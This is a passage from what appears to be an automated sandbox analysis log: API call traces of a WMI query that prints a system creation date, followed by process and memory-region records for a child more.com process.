[0407.041] memcpy (in: _Dst=0x334ca8, _Src=0x2c68ce, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.044] memcpy (in: _Dst=0x334ca8, _Src=0x304c58, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.044] memcpy (in: _Dst=0x334ca8, _Src=0x304c5a, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.045] memcpy (in: _Dst=0x334ca8, _Src=0x304c5c, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.045] memcpy (in: _Dst=0x334ca8, _Src=0x304c5e, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.046] memcpy (in: _Dst=0x334ca8, _Src=0x304c60, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.046] memcpy (in: _Dst=0x334ca8, _Src=0x304c62, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.047] memcpy (in: _Dst=0x334ca8, _Src=0x304c64, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.047] memcpy (in: _Dst=0x334ca8, _Src=0x304c66, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.048] memcpy (in: _Dst=0x334ca8, _Src=0x304c68, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.048] memcpy (in: _Dst=0x334ca8, _Src=0x304c6a, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.048] memcpy (in: _Dst=0x334ca8, _Src=0x304c6c, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.049] memcpy (in: _Dst=0x334ca8, _Src=0x304c6e, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.049] memcpy (in: _Dst=0x334ca8, _Src=0x304c70, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.050] memcpy (in: _Dst=0x334ca8, _Src=0x304c72, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.050] memcpy (in: _Dst=0x334ca8, _Src=0x304c74, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.051] memcpy (in: _Dst=0x334ca8, _Src=0x304c76, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.051] memcpy (in: _Dst=0x334ca8, _Src=0x304c78, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.051] memcpy (in: _Dst=0x334ca8, _Src=0x304c7a, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.052] memcpy (in: _Dst=0x334ca8, _Src=0x304c7c, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.052] memcpy (in: _Dst=0x334ca8, _Src=0x304c7e, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.053] memcpy (in: _Dst=0x334ca8, _Src=0x304c80, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.053] memcpy (in: _Dst=0x334ca8, _Src=0x304c82, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.053] memcpy (in: _Dst=0x334ca8, _Src=0x304c84, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.054] memcpy (in: _Dst=0x334ca8, _Src=0x304c86, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.054] memcpy (in: _Dst=0x334ca8, _Src=0x304c88, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.057] memcpy (in: _Dst=0x334ca8, _Src=0x2c68b8, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.057] memcpy (in: _Dst=0x334ca8, _Src=0x2c68ba, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.058] memcpy (in: _Dst=0x334ca8, _Src=0x2c68bc, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.058] memcpy (in: _Dst=0x334ca8, _Src=0x2c68be, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.059] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c0, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.059] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c2, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.059] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c4, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.060] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c6, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.060] memcpy (in: _Dst=0x334ca8, _Src=0x2c68c8, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.061] memcpy (in: _Dst=0x334ca8, _Src=0x2c68ca, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.061] memcpy (in: _Dst=0x334ca8, _Src=0x2c68cc, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.062] memcpy (in: _Dst=0x334ca8, _Src=0x2c68ce, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.063] memcpy (in: _Dst=0x2c6688, _Src=0x334ca8, _Size=0x0 | out: _Dst=0x2c6688) returned 0x2c6688
[0407.063] memcpy (in: _Dst=0x2c6688, _Src=0x2c68b8, _Size=0x18 | out: _Dst=0x2c6688) returned 0x2c6688
[0407.064] memcpy (in: _Dst=0x3605b8, _Src=0x7fef4b603c0, _Size=0xa | out: _Dst=0x3605b8) returned 0x3605b8
[0407.065] memcpy (in: _Dst=0x2c6228, _Src=0x2c6958, _Size=0x1e | out: _Dst=0x2c6228) returned 0x2c6228
[0407.065] memcpy (in: _Dst=0x2c6958, _Src=0x2c6688, _Size=0x18 | out: _Dst=0x2c6958) returned 0x2c6958
[0407.065] memcpy (in: _Dst=0x2c6970, _Src=0x2c6228, _Size=0x1e | out: _Dst=0x2c6970) returned 0x2c6970
[0407.067] memcpy (in: _Dst=0x334ca8, _Src=0x304c58, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.067] memcpy (in: _Dst=0x334ca8, _Src=0x304c5a, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.068] memcpy (in: _Dst=0x334ca8, _Src=0x304c5c, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.068] memcpy (in: _Dst=0x334ca8, _Src=0x304c5e, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.069] memcpy (in: _Dst=0x334ca8, _Src=0x304c60, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.069] memcpy (in: _Dst=0x334ca8, _Src=0x304c62, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.069] memcpy (in: _Dst=0x334ca8, _Src=0x304c64, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.070] memcpy (in: _Dst=0x334ca8, _Src=0x304c66, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.070] memcpy (in: _Dst=0x334ca8, _Src=0x304c68, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.071] memcpy (in: _Dst=0x334ca8, _Src=0x304c6a, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.071] memcpy (in: _Dst=0x334ca8, _Src=0x304c6c, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.072] memcpy (in: _Dst=0x334ca8, _Src=0x304c6e, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.072] memcpy (in: _Dst=0x334ca8, _Src=0x304c70, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.073] memcpy (in: _Dst=0x334ca8, _Src=0x304c72, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.073] memcpy (in: _Dst=0x334ca8, _Src=0x304c74, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.074] memcpy (in: _Dst=0x334ca8, _Src=0x304c76, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.074] memcpy (in: _Dst=0x334ca8, _Src=0x304c78, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.075] memcpy (in: _Dst=0x334ca8, _Src=0x304c7a, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.075] memcpy (in: _Dst=0x334ca8, _Src=0x304c7c, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.076] memcpy (in: _Dst=0x334ca8, _Src=0x304c7e, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.076] memcpy (in: _Dst=0x334ca8, _Src=0x304c80, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.076] memcpy (in: _Dst=0x334ca8, _Src=0x304c82, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.077] memcpy (in: _Dst=0x334ca8, _Src=0x304c84, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.077] memcpy (in: _Dst=0x334ca8, _Src=0x304c86, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.078] memcpy (in: _Dst=0x334ca8, _Src=0x304c88, _Size=0x2 | out: _Dst=0x334ca8) returned 0x334ca8
[0407.080] memcpy (in: _Dst=0x2c6228, _Src=0x334ca8, _Size=0x0 | out: _Dst=0x2c6228) returned 0x2c6228
[0407.080] memcpy (in: _Dst=0x2c6228, _Src=0x304c58, _Size=0x32 | out: _Dst=0x2c6228) returned 0x2c6228
[0407.081] memcpy (in: _Dst=0x334cd8, _Src=0x2c6688, _Size=0x4 | out: _Dst=0x334cd8) returned 0x334cd8
[0407.081] memcpy (in: _Dst=0x2c6688, _Src=0x2c6228, _Size=0x32 | out: _Dst=0x2c6688) returned 0x2c6688
[0407.081] memcpy (in: _Dst=0x2c66ba, _Src=0x334cd8, _Size=0x4 | out: _Dst=0x2c66ba) returned 0x2c66ba
[0407.082] memcpy (in: _Dst=0x360608, _Src=0x7fef4b60620, _Size=0xe | out: _Dst=0x360608) returned 0x360608
[0407.082] memcpy (in: _Dst=0x2c9038, _Src=0x2c6688, _Size=0x36 | out: _Dst=0x2c9038) returned 0x2c9038
[0407.082] memcpy (in: _Dst=0x2c906e, _Src=0x334cd8, _Size=0x4 | out: _Dst=0x2c906e) returned 0x2c906e
[0407.082] memcpy (in: _Dst=0x2c7b28, _Src=0x2c6958, _Size=0x36 | out: _Dst=0x2c7b28) returned 0x2c7b28
[0407.082] memcpy (in: _Dst=0x2c7b5e, _Src=0x334cd8, _Size=0x4 | out: _Dst=0x2c7b5e) returned 0x2c7b5e
[0407.083] memcpy (in: _Dst=0x2d6cd8, _Src=0x2c7b28, _Size=0x3a | out: _Dst=0x2d6cd8) returned 0x2d6cd8
[0407.083] memcpy (in: _Dst=0x2d6d12, _Src=0x2c9038, _Size=0x3a | out: _Dst=0x2d6d12) returned 0x2d6d12
[0407.083] GetCurrentThreadId () returned 0xdf0
[0407.084] DllRegisterServer () returned 0x0
[0407.084] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.084] ISystemDebugEventFire:IsActive (This=0x2d91c0) returned 0x1
[0407.084] free (_Block=0x361c60)
[0407.084] ??3@YAXPEAX@Z () returned 0x20016700580001
[0407.084] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.085] free (_Block=0x20fdc0)
[0407.085] GetCurrentThreadId () returned 0xdf0
[0407.085] GetCurrentThreadId () returned 0xdf0
[0407.085] IUnknown:Release (This=0x2d91c0) returned 0x1
[0407.085] DllRegisterServer () returned 0x0
[0407.085] DllRegisterServer () returned 0x0
[0407.086] GetUserDefaultLCID () returned 0x409
[0407.086] GetACP () returned 0x4e4
[0407.086] ??3@YAXPEAX@Z () returned 0x200168005c0001
[0407.086] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.086] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.087] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.087] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.087] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.087] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.190] free (_Block=0x20f0c0)
[0407.190] free (_Block=0x360c50)
[0407.190] free (_Block=0x360440)
[0407.190] free (_Block=0x20f4f0)
[0407.190] free (_Block=0x20f1f0)
[0407.190] free (_Block=0x20a900)
[0407.191] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.191] ??3@YAXPEAX@Z () returned 0x74007a007e0001
[0407.191] ISystemDebugEventFire:EndSession (This=0x2d91c0) returned 0x0
[0407.191] IUnknown:Release (This=0x2d91c0) returned 0x0
[0407.191] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.191] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.191] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.192] DllRegisterServer () returned 0x0
[0407.192] IXSLProcessor:get_output (in: This=0x2139640, pOutput=0x16f240 | out: pOutput=0x16f240*(varType=0x8, wReserved1=0x213, wReserved2=0x0, wReserved3=0x0, varVal1="CreationDate \r\n20240119140101.223600+060 \r\n", varVal2=0x1)) returned 0x0
[0407.193] malloc (_Size=0x18) returned 0x209040
[0407.193] XSLTemplate:IUnknown:Release (This=0x2139640) returned 0x0
[0407.193] FreeThreadedDOMDocument:IUnknown:Release (This=0x213b330) returned 0x2
[0407.193] XSLTemplate:IUnknown:Release (This=0x2137620) returned 0x0
[0407.195] memcpy (in: _Dst=0x16efc0, _Src=0x20d9a0, _Size=0x10 | out: _Dst=0x16efc0) returned 0x16efc0
[0407.195] free (_Block=0x35c430)
[0407.196] ??3@YAXPEAX@Z () returned 0x200169005c0001
[0407.196] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.197] free (_Block=0x20d9a0)
[0407.197] ??3@YAXPEAX@Z () returned 0x45004c000e0001
[0407.198] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.198] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0407.198] free (_Block=0x2086c0)
[0407.198] free (_Block=0x20cee0)
[0407.198] malloc (_Size=0x80) returned 0x20fdc0
[0407.198] memcpy_s (in: _Destination=0x20fdc0, _DestinationSize=0x7e, _Source=0x2d6d68, _SourceSize=0x74 | out: _Destination=0x20fdc0) returned 0x0
[0407.198] malloc (_Size=0x30) returned 0x2086c0
[0407.198] free (_Block=0x2086c0)
[0407.198] malloc (_Size=0x40) returned 0x20fe50
[0407.198] memcpy_s (in: _Destination=0x20fe50, _DestinationSize=0x3e, _Source=0x20fdc0, _SourceSize=0x3a | out: _Destination=0x20fe50) returned 0x0
[0407.199] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="CreationDate \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30
[0407.199] malloc (_Size=0x1e) returned 0x20cee0
[0407.199] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="CreationDate \r\n", cchWideChar=-1, lpMultiByteStr=0x20cee0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreationDate \r\n", lpUsedDefaultChar=0x0) returned 30
[0407.199] fprintf (in: _File=0x7feff862ab0, _Format="%s" | out: _File=0x7feff862ab0) returned 29
[0407.199] fflush (in: _File=0x7feff862ab0 | out: _File=0x7feff862ab0) returned 0
[0407.204] free (_Block=0x20cee0)
[0407.204] free (_Block=0x20fe50)
[0407.204] malloc (_Size=0x40) returned 0x20fe50
[0407.204] memcpy_s (in: _Destination=0x20fe50, _DestinationSize=0x3e, _Source=0x20fdfa, _SourceSize=0x3a | out: _Destination=0x20fe50) returned 0x0
[0407.204] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="20240119140101.223600+060 \r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30
[0407.204] malloc (_Size=0x1e) returned 0x20cee0
[0407.205] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="20240119140101.223600+060 \r\n", cchWideChar=-1, lpMultiByteStr=0x20cee0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="20240119140101.223600+060 \r\n", lpUsedDefaultChar=0x0) returned 30
[0407.205] fprintf (in: _File=0x7feff862ab0, _Format="%s" | out: _File=0x7feff862ab0) returned 29
[0407.205] fflush (in: _File=0x7feff862ab0 | out: _File=0x7feff862ab0) returned 0
[0407.205] free (_Block=0x20cee0)
[0407.205] free (_Block=0x20fe50)
[0407.206] malloc (_Size=0x800) returned 0x20efc0
[0407.206] LoadStringW (in: hInstance=0x0, uID=0xafd2, lpBuffer=0x20efc0, cchBufferMax=1024 | out: lpBuffer="\r\n") returned 0x2
[0407.206] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3
[0407.206] malloc (_Size=0x3) returned 0x207fa0
[0407.206] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x207fa0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
[0407.206] fprintf (in: _File=0x7feff862ab0, _Format="%s" | out: _File=0x7feff862ab0) returned 2
[0407.207] fflush (in: _File=0x7feff862ab0 | out: _File=0x7feff862ab0) returned 0
[0407.207] free (_Block=0x207fa0)
[0407.207] free (_Block=0x20efc0)
[0407.207] free (_Block=0x20fdc0)
[0407.207] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0407.208] free (_Block=0x209040)
[0407.208] ??1CHString@@QEAA@XZ () returned 0x55f9f701
[0407.208] FreeThreadedDOMDocument:IUnknown:Release (This=0x21371d0) returned 0x0
[0407.208] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4e0c96c
[0407.208] free (_Block=0x2096e0)
[0407.208] malloc (_Size=0x18) returned 0x2096e0
[0407.208] free (_Block=0x209740)
[0407.208] malloc (_Size=0x18) returned 0x209740
[0407.208] free (_Block=0x20cce0)
[0407.208] free (_Block=0x209760)
[0407.209] free (_Block=0x209700)
[0407.209] free (_Block=0x2096c0)
[0407.209] free (_Block=0x2096e0)
[0407.209] free (_Block=0x209740)
[0407.209] free (_Block=0x20cbe0)
[0407.209] free (_Block=0x2095c0)
[0407.209] free (_Block=0x208680)
[0407.209] free (_Block=0x20cde0)
[0407.209] free (_Block=0x20ce10)
[0407.209] free (_Block=0x208780)
[0407.209] free (_Block=0x209780)
[0407.210] free (_Block=0x208640)
[0407.210] free (_Block=0x209620)
[0407.210] free (_Block=0x2096a0)
[0407.210] free (_Block=0x20cdc0)
[0407.210] free (_Block=0x206e10)
[0407.210] free (_Block=0x20cd60)
[0407.210] free (_Block=0x20ce30)
[0407.210] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4e0c96c
[0407.210] free (_Block=0x20cc60)
[0407.210] free (_Block=0x2095e0)
[0407.210] free (_Block=0x209600)
[0407.210] free (_Block=0x20cd10)
[0407.210] free (_Block=0x20cd40)
[0407.210] free (_Block=0x20cd90)
[0407.211] free (_Block=0x207f00)
[0407.211] free (_Block=0x207f50)
[0407.211] free (_Block=0x2065e0)
[0407.211] free (_Block=0x209660)
[0407.211] free (_Block=0x206670)
[0407.211] free (_Block=0x206df0)
[0407.211] free (_Block=0x208080)
[0407.211] free (_Block=0x206dd0)
[0407.211] free (_Block=0x208040)
[0407.212] free (_Block=0x2069b0)
[0407.212] free (_Block=0x208000)
[0407.212] free (_Block=0x206890)
[0407.212] free (_Block=0x2068b0)
[0407.212] free (_Block=0x206830)
[0407.212] free (_Block=0x206850)
[0407.212] free (_Block=0x2068f0)
[0407.212] free (_Block=0x206910)
[0407.212] free (_Block=0x206950)
[0407.212] free (_Block=0x206970)
[0407.213] free (_Block=0x206770)
[0407.213] free (_Block=0x206790)
[0407.213] free (_Block=0x206710)
[0407.213] free (_Block=0x206730)
[0407.213] free (_Block=0x2067d0)
[0407.213] free (_Block=0x2067f0)
[0407.213] free (_Block=0x2066b0)
[0407.213] free (_Block=0x2066d0)
[0407.213] free (_Block=0x206630)
[0407.213] free (_Block=0x34dfa0)
[0407.213] free (_Block=0x20cb50)
[0407.214] WbemObjectTextSrc:IUnknown:Release (This=0x33e830) returned 0x0
[0407.214] IUnknown:Release (This=0x2c8dd0) returned 0x0
[0407.214] WbemLocator:IUnknown:Release (This=0x26cc20) returned 0x2
[0407.214] WbemLocator:IUnknown:Release (This=0x2d6680) returned 0x0
[0407.216] WbemLocator:IUnknown:Release (This=0x2d6560) returned 0x0
[0407.217] WbemLocator:IUnknown:Release (This=0x26cc20) returned 0x1
[0407.217] ?Empty@CHString@@QEAAXXZ () returned 0x7fef4e0c96c
[0407.217] WbemLocator:IUnknown:Release (This=0x26cc20) returned 0x0
[0407.217] free (_Block=0x2094e0)
[0407.217] free (_Block=0x209500)
[0407.217] free (_Block=0x208580)
[0407.217] free (_Block=0x209520)
[0407.218] free (_Block=0x209540)
[0407.218] free (_Block=0x2085c0)
[0407.218] free (_Block=0x209360)
[0407.218] free (_Block=0x209380)
[0407.218] free (_Block=0x208400)
[0407.218] free (_Block=0x2093a0)
[0407.218] free (_Block=0x2093c0)
[0407.218] free (_Block=0x208440)
[0407.223] free (_Block=0x2092e0)
[0407.223] free (_Block=0x209300)
[0407.223] free (_Block=0x208380)
[0407.223] free (_Block=0x209320)
[0407.223] free (_Block=0x209340)
[0407.223] free (_Block=0x2083c0)
[0407.223] free (_Block=0x209460)
[0407.223] free (_Block=0x209480)
[0407.223] free (_Block=0x208500)
[0407.223] free (_Block=0x2094a0)
[0407.224] free (_Block=0x2094c0)
[0407.224] free (_Block=0x208540)
[0407.224] free (_Block=0x209260)
[0407.224] free (_Block=0x209280)
[0407.224] free (_Block=0x208300)
[0407.224] free (_Block=0x2092a0)
[0407.224] free (_Block=0x2092c0)
[0407.224] free (_Block=0x208340)
[0407.225] free (_Block=0x2093e0)
[0407.225] free (_Block=0x209400)
[0407.225] free (_Block=0x208480)
[0407.225] free (_Block=0x209420)
[0407.225] free (_Block=0x209440)
[0407.225] free (_Block=0x2084c0)
[0407.225] free (_Block=0x2091a0)
[0407.225] free (_Block=0x2091c0)
[0407.225] free (_Block=0x208240)
[0407.226] free (_Block=0x209060)
[0407.226] free (_Block=0x209080)
[0407.226] free (_Block=0x208100)
[0407.226] free (_Block=0x209000)
[0407.226] free (_Block=0x209020)
[0407.226] free (_Block=0x2080c0)
[0407.226] free (_Block=0x2090e0)
[0407.226] free (_Block=0x209100)
[0407.226] free (_Block=0x208180)
[0407.227] free (_Block=0x2091e0)
[0407.227] free (_Block=0x209200)
[0407.227] free (_Block=0x208280)
[0407.227] free (_Block=0x2090a0)
[0407.227] free (_Block=0x2090c0)
[0407.227] free (_Block=0x208140)
[0407.227] free (_Block=0x209120)
[0407.227] free (_Block=0x209140)
[0407.227] free (_Block=0x2081c0)
[0407.228] free (_Block=0x209160)
[0407.228] free (_Block=0x209180)
[0407.228] free (_Block=0x208200)
[0407.228] free (_Block=0x209220)
[0407.228] free (_Block=0x209240)
[0407.228] free (_Block=0x2082c0)
[0407.228] CoUninitialize ()
[0407.229] DllCanUnloadNow () returned 0x0
[0407.273] free (_Block=0x20e630)
[0407.273] ??3@YAXPEAX@Z () returned 0x740098002e0001
[0407.273] ??3@YAXPEAX@Z () returned 0x45005000050001
[0407.274] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.274] ??3@YAXPEAX@Z () returned 0x55f9f701
[0407.274] free (_Block=0x20a7f0)
[0407.367] exit (_Code=0)
[0407.367] free (_Block=0x206e60)
[0407.367] free (_Block=0x207db0)
[0407.367] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0407.367] free (_Block=0x206ef0)
[0407.367] free (_Block=0x206690)
[0407.367] free (_Block=0x207d70)
[0407.367] free (_Block=0x207d30)
[0407.367] free (_Block=0x207ce0)
[0407.367] free (_Block=0x207ca0)
[0407.367] free (_Block=0x20ce60)
[0407.367] free (_Block=0x207c40)
[0407.368] free (_Block=0x207bc0)
[0407.368] free (_Block=0x205b20)
[0407.368] free (_Block=0x20ceb0)
[0407.368] ??1CHString@@QEAA@XZ () returned 0x7fef4e0c96c
[0407.368] free (_Block=0x208600)
Thread:
id = 119
os_tid = 0xdc0
Thread:
id = 120
os_tid = 0xde4
Thread:
id = 121
os_tid = 0xd78
Thread:
id = 122
os_tid = 0xdf4
Thread:
id = 123
os_tid = 0xeb4
Process:
id = "20"
image_name = "more.com"
filename = "c:\\windows\\system32\\more.com"
page_root = "0x24b5d000"
os_pid = "0xde8"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "18"
os_parent_pid = "0xdd4"
cmd_line = "more "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 2464
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 2465
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 2466
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 2467
start_va = 0x130000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 2468
start_va = 0x77880000
end_va = 0x77a28fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 2469
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 2470
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 2471
start_va = 0xff8e0000
end_va = 0xff8e9fff
monitored = 0
entry_point = 0xff8e409c
region_type = mapped_file
name = "more.com"
filename = "\\Windows\\System32\\more.com" (normalized: "c:\\windows\\system32\\more.com")
Region:
id = 2472
start_va = 0x7feffba0000
end_va = 0x7feffba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 2473
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 2474
start_va = 0x7fffffdd000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 2475
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 2476
start_va = 0x1b0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 2477
start_va = 0x77660000
end_va = 0x7777efff
monitored = 0
entry_point = 0x77675340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 2478
start_va = 0x7fefd920000
end_va = 0x7fefd98bfff
monitored = 0
entry_point = 0x7fefd922780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 2479
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 2480
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 2481
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 2482
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
